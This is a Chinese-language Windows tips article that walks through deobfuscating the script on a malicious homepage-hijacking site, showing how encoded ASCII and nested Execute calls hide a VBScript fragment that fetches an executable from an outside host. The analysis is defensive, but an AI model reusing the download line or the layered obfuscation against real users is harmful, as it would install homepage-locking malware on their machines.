Windows XP Windows 7 Windows 2003 Windows Vista Windows教程綜合 Linux 系統教程
Windows 10 Windows 8 Windows 2008 Windows NT Windows Server 電腦軟件教程
 Windows教程網 >> Windows教程綜合 >> Windows技巧 >> 輕松挖出惡意網站中藏的病毒

輕松挖出惡意網站中藏的病毒

日期:2017/2/8 11:33:35      編輯:Windows技巧
 

前不久,很多網友都感染了www.7b.com.cn的病毒,首頁被改成這個網站,並且無法改回。黑客是如何做到鎖定用戶的浏覽器首頁呢?下面我們就去探個究竟。

提醒:分析病毒存在一定風險,建議在虛擬機下操作。

第一步 查看www.7b.com.cn首頁的源代碼,可以發現在尾部有如下的字樣:

這是一個嵌入到7b網址之家首頁的頁面,即打開www.7b.com.cn也就同時打開了這個頁面。

而“http://m.dashow.com.cn/m.html”表示的是一個字符串,“&#”後面是每個字符串ASCII的十進制值。

直接把這段亂碼保存為HTM文件,用IE打開,就可以看到它的真實面目“http://m.dashow.com.cn/m.html”。

第二步 查看http://m.dashow.com.cn/m.html的源代碼,把看的腳本段中的Execute替換為Document.Write,然後打開這個HTM頁面,就會出現一段代碼,同樣地,把EXECUTE換成我們無敵的Document.Write,前後加腳本標記,存HTM打開。屏幕上立即出現了一段令人眼花的東西。把眼花缭亂的東西整理一下,並將出現的CHR()在前面用到過,作用是把字符的ASCII轉成字符,只不過這次是16進制。然後再將字符拼接成字符串,然後再Execute運行這個命令字符串。繼續用Document.Write替換掉EXECUTE,前後加腳本標記,存HTM打開。

第三步 經過上幾步的還原後終於看到了這個惡意頁面的最終面目。

on error resume next curl = "http://m.dashow.com.cn/start.exe"……其後省略。

這段代碼中我們可以很清楚地看到http://m.dashow.com.cn/start.exe這個鏈接。沒錯,它就是運行後可以將用戶主頁鎖定為www.7b.com.cn的病毒。

可以用下載工具將這個文件下載下來,如果你的殺毒軟件查不到的話最好立即上報。這樣可以保證殺毒軟件快速查殺這個病毒,並使更少的網友免受該病毒的侵害。

Copyright © Windows教程網 All Rights Reserved